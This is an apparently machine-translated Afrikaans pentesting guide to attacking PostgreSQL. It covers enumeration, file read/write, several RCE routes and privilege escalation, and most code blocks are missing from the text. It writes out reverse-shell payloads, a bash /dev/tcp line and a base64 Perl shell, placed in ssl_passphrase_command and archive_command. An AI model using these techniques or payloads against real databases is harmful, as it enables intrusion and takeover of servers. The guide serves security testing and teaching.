5432,5433 - Pentesting Postgresql
Gebruik Trickest om maklik te bou en outomatiseer werkstrome aangedryf deur die wêreld se mees gevorderde gemeenskaps gereedskap. Kry Toegang Vandag:
Basiese Inligting
PostgreSQL word beskryf as 'n objek-relasionele databasis stelsel wat oorspronklik is. Hierdie stelsel maak nie net gebruik van die SQL-taal nie, maar verbeter dit ook met addisionele kenmerke. Sy vermoëns maak dit moontlik om 'n wye verskeidenheid data tipes en operasies te hanteer, wat dit 'n veelsydige keuse maak vir ontwikkelaars en organisasies.
Verstek poort: 5432, en as hierdie poort reeds in gebruik is, lyk dit asof postgresql die volgende poort sal gebruik (5433 waarskynlik) wat nie in gebruik is nie.
Koppel & Basiese Enum
As jy \list
hardloop en 'n databasis met die naam rdsadmin
vind, weet jy dat jy binne 'n AWS postgresql databasis is.
Vir meer inligting oor hoe om 'n PostgreSQL databasis te misbruik kyk:
pagePostgreSQL injectionOutomatiese Opsomming
Poortskandering
Volgens hierdie navorsing, wanneer 'n verbindingspoging misluk, gooi dblink
'n sqlclient_unable_to_establish_sqlconnection
-uitsondering wat 'n verduideliking van die fout insluit. Voorbeelde van hierdie besonderhede word hieronder gelys.
Gasheer is af
DETAIL: kon nie aan die bediener koppel nie: Geen roete na gasheer Is die bediener aan die hardloop op gasheer "1.2.3.4" en aanvaar TCP/IP-koppeling op poort 5678?
Poort is toe
Poort is oop
PostgreSQL Pentesting
PostgreSQL Enumeration
PostgreSQL kan geënumereer word deur die volgende stappe te volg:
Port Scanning: Skandeer die bediener om die poorte te identifiseer waarop PostgreSQL hardloop.
Banner Grabbing: Verkry die banierinligting om die PostgreSQL-weergawe te identifiseer.
Service Detection: Identifiseer die diens deur spesifieke kenmerke te ondersoek.
Database Enumeration: Identifiseer databasisse en gebruikers binne die PostgreSQL-diens.
PostgreSQL Exploitation
PostgreSQL kan geëxploiteer word deur die volgende metodes:
Brute Force-aanvalle: Aanvalle wat gebruik maak van gereedskap soos Hydra om aan te meld by PostgreSQL met gesteelde geloofsbriewe.
SQL Injection: Gebruik van SQL-injeksie om databasisinligting te onttrek of die databasis te manipuleer.
PostgreSQL UDF Exploitation: Gebruik van PostgreSQL User Defined Functions (UDFs) vir aanvalle soos die uitvoering van afgeleë kode.
File System Access: Indien die PostgreSQL-diens toegang het tot die bediener se lêersisteem, kan dit gebruik word vir verdere aanvalle.
Poort is oop of gefiltreer
In PL/pgSQL funksies, is dit tans nie moontlik om uitsonderingsbesonderhede te verkry nie. Indien jy egter direkte toegang tot die PostgreSQL-bediener het, kan jy die nodige inligting terugkry. Indien dit nie haalbaar is om gebruikersname en wagwoorde uit die stelseltabelle te onttrek nie, kan jy oorweeg om die woordelysaanvalmetode wat bespreek is in die vorige afdeling, te gebruik, aangesien dit moontlik positiewe resultate kan oplewer.
Opsomming van Voorregte
Rolle
Rol Tipes | |
---|---|
rolsuper | Rol het supergebruiker-voorregte |
rolinherit | Rol erf outomaties voorregte van rolle waarvan dit 'n lid is |
rolcreaterole | Rol kan meer rolle skep |
rolcreatedb | Rol kan databasisse skep |
rolcanlogin | Rol kan aanteken. Dit beteken dat hierdie rol as die aanvanklike sessie-outorisasie-identifiseerder gegee kan word |
rolreplication | Rol is 'n replikasie rol. 'n Replikasie rol kan replikasieverbindinge inisieer en replikasieslotte skep en laat val |
rolconnlimit | Vir rolle wat kan aanteken, stel dit die maksimum aantal gelyktydige verbindinge in wat hierdie rol kan maak. -1 beteken geen limiet. |
rolpassword | Nie die wagwoord (lees altyd as |
rolvaliduntil | Wagwoordvervaltyd (slegs gebruik vir wagwoordverifikasie); nul indien geen verval |
rolbypassrls | Rol verbygaan elke ryvlak-sekuriteitsbeleid, sien Afdeling 5.8 vir meer inligting. |
rolconfig | Rol-spesifieke verstekwaardes vir hardlooptydkonfigurasie-veranderlikes |
oid | ID van rol |
Interessante Groepe
As jy 'n lid is van
pg_execute_server_program
kan jy programme uitvoerAs jy 'n lid is van
pg_read_server_files
kan jy lêers leesAs jy 'n lid is van
pg_write_server_files
kan jy lêers skryf
Let daarop dat in Postgres 'n gebruiker, 'n groep en 'n rol dieselfde is. Dit hang net af van hoe jy dit gebruik en of jy dit toelaat om in te teken.
Tabelle
Funksies
Lêerstelselaksies
Lees gids en lêers
Vanaf hierdie commit kan lede van die gedefinieerde DEFAULT_ROLE_READ_SERVER_FILES
groep (genaamd pg_read_server_files
) en supergebruikers die COPY
metode gebruik op enige pad (kyk na convert_and_check_filename
in genfile.c
):
Onthou dat as jy nie 'n supergebruiker is nie, maar wel die CREATEROLE-permissies het, kan jy jouself lid van daardie groep maak:
Daar is ander postgres-funksies wat gebruik kan word om 'n lêer te lees of 'n gids te lys. Slegs supergebruikers en gebruikers met uitdruklike toestemmings kan hulle gebruik:
Jy kan meer funksies vind op https://www.postgresql.org/docs/current/functions-admin.html
Eenvoudige Lêer Skryf
Slegs super gebruikers en lede van pg_write_server_files
kan copy
gebruik om lêers te skryf.
Onthou dat as jy nie 'n supergebruiker is nie, maar wel die CREATEROLE
-permissies het, kan jy jouself lid van daardie groep maak:
Onthou dat KOPIE nie nuwe lynkarakters kan hanteer nie, daarom moet jy selfs as jy 'n base64-lading gebruik 'n eenlynstuk stuur. 'n Baie belangrike beperking van hierdie tegniek is dat copy
nie gebruik kan word om binêre lêers te skryf nie, omdat dit sommige binêre waardes wysig.
Oplaai van binêre lêers
Daar is egter ander tegnieke om groot binêre lêers te laai:
pageBig Binary Files Upload (PostgreSQL)Bugsbounty wenk: teken aan vir Intigriti, 'n premium bugsbounty platform geskep deur hackers, vir hackers! Sluit by ons aan by https://go.intigriti.com/hacktricks vandag, en begin om belonings tot $100,000 te verdien!
Opdatering van PostgreSQL tabeldata via plaaslike lêer skryf
As jy die nodige regte het om PostgreSQL-bedienerlêers te lees en te skryf, kan jy enige tabel op die bediener opdateer deur die geassosieerde lêernode te owerwrite in die PostgreSQL data-gids. Meer oor hierdie tegniek hier.
Vereiste stappe:
Kry die PostgreSQL data-gids
Nota: As jy nie die huidige data-gids vanaf instellings kan kry nie, kan jy die hoof PostgreSQL-weergawe deur die SELECT version()
-navraag kry en probeer om die pad te brute force. Gewone data-gidspaaie op Unix-installasies van PostgreSQL is /var/lib/PostgreSQL/MAJOR_VERSION/CLUSTER_NAME/
. 'n Gewone klasternaam is main
. 2. Kry 'n relatiewe pad na die lêernode wat met die teikentabel geassosieer is
Hierdie navraag behoort iets soos base/3/1337
terug te gee. Die volledige pad op skyf sal wees $DATA_GIDS/base/3/1337
, m.a.w. /var/lib/postgresql/13/main/base/3/1337
. 3. Laai die lêernode af deur die lo_*
-funksies
Kry die datatipe wat met die teikentabel geassosieer is
Gebruik die PostgreSQL Filenode Editor om die lêernode te wysig; stel alle
rol*
booleaanse vlae in op 1 vir volle regte.
(Opsioneel) Maak die in-memory tabelkassie skoon deur 'n duur SQL-navraag uit te voer
Jy behoort nou opgedateerde tabelwaardes in die PostgreSQL te sien.
Jy kan ook 'n superadmin word deur die pg_authid
-tabel te wysig. Sien die volgende afdeling.
RCE
RCE na program
Vanaf weergawe 9.3 kan slegs supergebruikers en lede van die groep pg_execute_server_program
kopie vir RCE gebruik (voorbeeld met eksfiltrering:
Voorbeeld om uit te voer:
Onthou dat as jy nie 'n supergebruiker is nie, maar wel die CREATEROLE
-permissies het, kan jy jouself lid van daardie groep maak:
Of gebruik die multi/postgres/postgres_copy_from_program_cmd_exec
module van metasploit.
Meer inligting oor hierdie kwesbaarheid hier. Terwyl dit as CVE-2019-9193 gerapporteer is, het Postges verklaar dat dit 'n kenmerk is en nie reggemaak sal word nie.
RCE met PostgreSQL Tale
pageRCE with PostgreSQL LanguagesRCE met PostgreSQL-uitbreidings
Sodra jy geleer het van die vorige pos hoe om binêre lêers te oplaai, kan jy probeer om RCE te verkry deur 'n postgresql-uitbreiding op te laai en dit te laai.
pageRCE with PostgreSQL ExtensionsPostgreSQL konfigurasie-lêer RCE
Die volgende RCE-vektore is veral nuttig in beperkte SQLi-kontekste, aangesien alle stappe deur geneste SELECT-stellings uitgevoer kan word
Die konfigurasie-lêer van PostgreSQL is skryfbaar deur die postgres-gebruiker, wat die een is wat die databasis hardloop, sodat jy as supergebruiker lêers in die lêersisteem kan skryf, en dus kan jy hierdie lêer oorskryf.
RCE met ssl_passphrase_command
Meer inligting oor hierdie tegniek hier.
Die konfigurasie-lêer het 'n paar interessante eienskappe wat tot RCE kan lei:
ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'
Pad na die privaatsleutel van die databasisssl_passphrase_command = ''
As die privaatsleutel deur 'n wagwoord beskerm word (geënkripteer) sal postgresql die opdrag wat in hierdie eienskap aangedui word uitvoer.ssl_passphrase_command_supports_reload = off
Indien hierdie eienskap aan is, sal die opdrag uitgevoer word as die sleutel deur 'n wagwoord beskerm word wanneerpg_reload_conf()
uitgevoer word.
Dan sal 'n aanvaller moet:
Dump privaatsleutel van die bediener
Enkripteer afgelaai privaatsleutel:
rsa -aes256 -in afgelaai-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key
Oorskryf
Dump die huidige postgresql konfigurasie
Oorskryf die konfigurasie met die genoemde eienskappekonfigurasie:
ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'
ssl_passphrase_command_supports_reload = on
Voer
pg_reload_conf()
uit
Tydens die toets van hierdie het ek opgemerk dat dit net sal werk as die privaatsleutel-lêer bevoegdhede 640 het, dit deur root besit word en deur die groep ssl-cert of postgres (sodat die postgres-gebruiker dit kan lees), en in /var/lib/postgresql/12/main geplaas is.
RCE met archive_command
Meer inligting oor hierdie konfigurasie en oor WAL hier.
'n Ander eienskap in die konfigurasie-lêer wat uitgebuit kan word, is archive_command
.
Om dit te laat werk, moet die archive_mode
instelling 'aan'
of 'altyd'
wees. As dit waar is, kan ons die opdrag in archive_command
oorskryf en dit dwing om via die WAL (write-ahead logging) operasies uit te voer.
Die algemene stappe is:
Kontroleer of argiefmodus geaktiveer is:
SELECT current_setting('archive_mode')
Oorskryf
archive_command
met die lading. Byvoorbeeld, 'n omgekeerde dop:archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'
Herlaai die konfigurasie:
SELECT pg_reload_conf()
Dwings die WAL-operasie om uit te voer, wat die argiefopdrag sal aanroep:
SELECT pg_switch_wal()
ofSELECT pg_switch_xlog()
vir sommige Postgres-weergawes
RCE met voorlaai biblioteke
Meer inligting oor hierdie tegniek hier.
Hierdie aanvalvektor maak gebruik van die volgende konfigurasie-veranderlikes:
session_preload_libraries
-- biblioteke wat deur die PostgreSQL-bedienaar by die kliëntverbinding gelaai sal word.dynamic_library_path
-- lys van gids waar die PostgreSQL-bedienaar vir die biblioteke sal soek.
Ons kan die dynamic_library_path
-waarde instel op 'n gids wat deur die postgres
-gebruiker wat die databasis hardloop, skryfbaar is, byvoorbeeld die /tmp/
-gids, en 'n skadelike .so
-voorwerp daar oplaai. Vervolgens sal ons die PostgreSQL-bedienaar dwing om ons nuutgelaai biblioteek te laai deur dit in die session_preload_libraries
-veranderlike in te sluit.
Die aanvalstappe is:
Laai die oorspronklike
postgresql.conf
afSluit die
/tmp/
-gids in diedynamic_library_path
-waarde in, byvoorbeelddynamic_library_path = '/tmp:$libdir'
Sluit die skadelike biblioteeknaam in die
session_preload_libraries
-waarde in, byvoorbeeldsession_preload_libraries = 'payload.so'
Kontroleer die hoof PostgreSQL-weergawe via die
SELECT version()
-navraagKompileer die skadelike biblioteekkode met die korrekte PostgreSQL-ontwikkelingspakket Voorbeeldkode:
Kompilering van die kode:
Laai die skadelike
postgresql.conf
, geskep in stappe 2-3, af en oorskryf die oorspronklike eenLaai die
payload.so
van stap 5 na die/tmp
-gidsHerlaai die bedienerskonfigurasie deur die bediener te herlaai of die
SELECT pg_reload_conf()
-navraag te roepBy die volgende DB-verbinding sal jy die omgekeerde dopverbinding ontvang.
Postgres Privesc
CREATEROLE Privesc
Toekenning
Volgens die dokumentasie: Rolle met die CREATEROLE
voorreg kan lidmaatskap in enige rol toeken of herroep wat nie 'n superuser is nie.
Dus, as jy CREATEROLE
toestemming het, kan jy jouself toegang gee tot ander rolle (wat nie superuser is nie) wat jou die opsie kan gee om lêers te lees en skryf en opdragte uit te voer:
Wysig Wagwoord
Gebruikers met hierdie rol kan ook die wagwoorde van ander nie-supergebruikers verander:
Privesc na SUPERUSER
Dit is redelik algemeen om te vind dat plaaslike gebruikers kan aanmeld by PostgreSQL sonder om enige wagwoord te verskaf. Daarom, sodra jy toestemmings om kode uit te voer ingesamel het, kan jy hierdie toestemmings misbruik om jou die SUPERUSER
rol te gee:
Dit is gewoonlik moontlik as gevolg van die volgende reëls in die pg_hba.conf
lêer:
WYSIG TABEL privesc
In hierdie skrywe word verduidelik hoe dit moontlik was om privesc in Postgres GCP te misbruik deur die ALTER TABLE-voorreg wat aan die gebruiker verleen is.
Wanneer jy probeer om 'n ander gebruiker eienaar van 'n tabel te maak, behoort jy 'n fout te kry wat dit voorkom, maar blykbaar het GCP daardie opsie aan die nie-supergebruiker postgres-gebruiker in GCP gegee:
Deur hierdie idee te koppel met die feit dat wanneer die INSERT/UPDATE/ANALYZE opdragte uitgevoer word op 'n tabel met 'n indeksfunksie, word die funksie as deel van die opdrag met die eienaar se toestemmings geroep. Dit is moontlik om 'n indeks met 'n funksie te skep en eienaarskapstoestemmings aan 'n supergebruiker oor daardie tabel te gee, en dan ANALYZE oor die tabel uit te voer met die skadelike funksie wat opdragte kan uitvoer omdat dit die toestemmings van die eienaar gebruik.
Uitbuiting
Begin deur 'n nuwe tabel te skep.
Voeg 'n paar irrelevante inhoud by die tabel in om data vir die indeksfunksie te voorsien.
Ontwikkel 'n skadelike indeksfunksie wat 'n koderingsuitvoeringslading bevat, wat ongemagtigde bevele moontlik maak om uitgevoer te word.
WYSIG die eienaar van die tabel na "cloudsqladmin," wat GCP se supergebruikersrol is wat uitsluitlik deur Cloud SQL gebruik word om die databasis te bestuur en te onderhou.
Voer 'n ANALYSE-operasie op die tabel uit. Hierdie aksie dwing die PostgreSQL-enjin om na die gebruikerskonteks van die tabel se eienaar, "cloudsqladmin," te skakel. Gevolglik word die skadelike indeksfunksie met die regte van "cloudsqladmin" geroep, wat die uitvoering van die voorheen ongemagtigde skel bevel moontlik maak.
In PostgreSQL lyk hierdie vloei so iets:
Dan sal die shell_commands_results
tabel die uitset van die uitgevoerde kode bevat:
Plaaslike Aanteken
Sommige verkeerd geconfigureerde postgresql-instanties mag dalk die aanteken van enige plaaslike gebruiker toelaat, dit is moontlik om plaaslik vanaf 127.0.0.1 te aanteken met behulp van die dblink
-funksie:
Let daarop dat vir die vorige navraag om te werk die funksie dblink
moet bestaan. As dit nie bestaan nie, kan jy probeer om dit te skep met
As jy die wagwoord van 'n gebruiker met meer voorregte het, maar die gebruiker is nie toegelaat om vanaf 'n eksterne IP in te teken nie, kan jy die volgende funksie gebruik om navrae as daardie gebruiker uit te voer:
Dit is moontlik om te kontroleer of hierdie funksie bestaan met:
Aangepaste gedefinieerde funksie met SECURITY DEFINER
In hierdie skryfstuk, was pentesters in staat om te priviligeer binne 'n postgres-instansie wat deur IBM voorsien word, omdat hulle hierdie funksie met die SECURITY DEFINER-vlag gevind het:
Soos verduidelik in die dokumentasie word 'n funksie met SECURITY DEFINER uitgevoer met die voorregte van die gebruiker wat dit besit. Daarom, as die funksie kwesbaar vir SQL-injeksie is of enige bevoorregte aksies met parameters wat deur die aanvaller beheer word, kan dit misbruik word om priviliges binne postgres te eskaleer.
In lyn 4 van die vorige kode kan jy sien dat die funksie die SECURITY DEFINER-vlag het.
En dan voer opdragte uit:
Pas Burteforce toe met PL/pgSQL
PL/pgSQL is 'n volledig uitgeruste programmeringstaal wat groter prosedurele beheer bied in vergelyking met SQL. Dit maak die gebruik van lusse en ander beheerstrukture moontlik om programlogika te verbeter. Daarbenewens het SQL-opdragte en triggers die vermoë om funksies aan te roep wat geskep is met die PL/pgSQL-taal. Hierdie integrasie maak 'n meer omvattende en veelsydige benadering tot databasisprogrammering en outomatisering moontlik. Jy kan hierdie taal misbruik om PostgreSQL te vra om die gebruikers se geloofsbriewe te burteforce.
pagePL/pgSQL Password BruteforcePrivesc deur die Oorskryf van Interne PostgreSQL-tabelle
Die volgende privesc-vektor is veral nuttig in beperkte SQLi-kontekste, aangesien alle stappe uitgevoer kan word deur geneste SELECT-opdragte
As jy PostgreSQL-bedienerlêers kan lees en skryf, kan jy 'n supergebruiker word deur die oorskryf van die PostgreSQL op skyf filenode, wat verband hou met die interne pg_authid
-tabel.
Lees meer oor hierdie tegniek hier.
Die aanvalstappe is:
Verkryg die PostgreSQL-data-gids
Verkryg 'n relatiewe pad na die filenode, wat verband hou met die
pg_authid
-tabelLaai die filenode af deur die
lo_*
-funksiesKry die datatipe wat verband hou met die
pg_authid
-tabelGebruik die PostgreSQL Filenode Editor om die filenode te wysig; stel alle
rol*
booleaanse vlae op 1 vir volle regte.Laai die gewysigde filenode weer op via die
lo_*
-funksies en oorskryf die oorspronklike lêer op die skyf(Opsioneel) Maak die in-memory tabel-cache skoon deur 'n duur SQL-opdrag uit te voer
Jy behoort nou die regte van 'n volle superadmin te hê.
POST
logging
Binne die postgresql.conf lêer kan jy postgresql-logboeke aktiveer deur te verander:
Dan, herlaai die diens.
pgadmin
pgadmin is 'n administrasie- en ontwikkelingsplatform vir PostgreSQL. Jy kan wagwoorde binne die pgadmin4.db lêer vind. Jy kan hulle ontsluit deur die decrypt funksie binne die skriffie te gebruik: https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py
pg_hba
Kliëntverifikasie in PostgreSQL word bestuur deur 'n konfigurasie lêer genaamd pg_hba.conf. Hierdie lêer bevat 'n reeks rekords, elkeen spesifiseer 'n verbindings tipe, klient IP-adres reeks (indien van toepassing), databasis naam, gebruikersnaam, en die verifikasiemetode om te gebruik vir ooreenstemmende verbindings. Die eerste rekord wat ooreenstem met die verbindings tipe, klient adres, aangevraagde databasis, en gebruikersnaam word gebruik vir verifikasie. Daar is geen terugval of rugsteun as verifikasie misluk nie. As geen rekord ooreenstem nie, word toegang geweier.
Die beskikbare wagwoord-gebaseerde verifikasiemetodes in pg_hba.conf is md5, crypt, en password. Hierdie metodes verskil in hoe die wagwoord oorgedra word: MD5-gehasht, crypt-geënkripteer, of teks in duidelike taal. Dit is belangrik om te let dat die crypt-metode nie gebruik kan word met wagwoorde wat in pg_authid geënkripteer is.
Gebruik Trickest om maklik te bou en werkvloei outomatiseer aangedryf deur die wêreld se mees gevorderde gemeenskaplike gereedskap. Kry Vandaag Toegang:
Last updated